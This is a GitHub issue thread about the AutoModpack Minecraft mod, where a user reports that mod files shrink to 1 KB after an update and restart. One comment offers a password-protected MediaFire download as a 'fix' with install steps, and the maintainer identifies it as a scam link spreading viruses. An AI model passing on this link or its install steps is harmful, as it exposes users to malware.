### ISSUE TITLE
Not work as expected and destroyed files

### ISSUE THREAD

**Issue by SanQianQVQ** [Skidamek/AutoModpack#275]
### Bug description

![screenshot](https://github.com/user-attachments/assets/d00edd77-8d4a-46bd-9730-16d1bf06c173)
The model files are normal before the update
After successfully updating the pop -up window of the restart game, all of mod files was destroyed, and it became only 1kb size

### Steps to reproduce

1. connect server
2. download files
3. restart game
4. a gui which say "restart" with green color
5. mod files broken 

### Expected behavior

Normal update

### Minecraft & Mod Loader versions

1.20.1 Fabric 0.15.x

### Minecraft launcher

Plain Craft Launcher II

### Operating system

Windows11

### AutoModpack version

Beta16

### Check list

- [X] I have verified that the issue persists in the latest version of the mod.
- [X] I have searched the existing issues and confirmed that this is not a duplicate.

**Comment by SanQianQVQ** [comment]
My game path is in the C drive, so is it possible to be caused by permission?

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SanQianQVQ** [comment]
> to fix your trouble try download this fix, i see it in another issue,要解决您的问题，请尝试下载此修复程序，我在另一个问题中看到它， https://app.mediafire.com/3ag3jpquii3of password: changeme 密码：changeme when you installing, you need to place a check in install to path and select "gcc."安装时，您需要检查安装路径并选择“gcc”。

Is there a specific Issue link? I want to know what caused errors

**Comment by SanQianQVQ** [comment]
add:
![ipaste](https://github.com/user-attachments/assets/5a2cd6ab-a426-43d0-a9d3-be11aa3475c6)

![ipaste](https://github.com/user-attachments/assets/96469431-87b6-419d-82c7-cef23a7d4777)

**Comment by SanQianQVQ** [comment]
Try to return to Beta15 and encounter the same problem: https://github.com/Skidamek/AutoModpack/issues/266

**Comment by SanQianQVQ** [comment]
Try to return to Beta14 and encounter the same problem: https://github.com/Skidamek/AutoModpack/issues/275

**Comment by SanQianQVQ** [comment]
same problem in beta13

**Comment by SanQianQVQ** [comment]
After checking, I found that the mod under the AutomodPack folder is normal.
But when I manually copy the MOD file under the automodpack folder to the Mods folder, start the game again, and there will still be the RESTART Game prompt box. Then the file is destroyed, only 1kb size

**Comment by Skidamek** [comment]
Please don't download anything from these random media fire links, these are a scam phishing link to download viruses

**Comment by Skidamek** [comment]
That works as intended, unless your game crashes

**Comment by Skidamek** [comment]
AutoModpack loads mods from that separate directory, its on wiki.

**Comment by Skidamek** [comment]
https://github.com/Skidamek/AutoModpack/wiki/File-Structure-&-Logic#client

**Comment by SanQianQVQ** [comment]
> That works as intended, unless your game crashes这会按预期工作，除非你的游戏崩溃

But did not work as expected, because the game directly collapsed after replacing the file
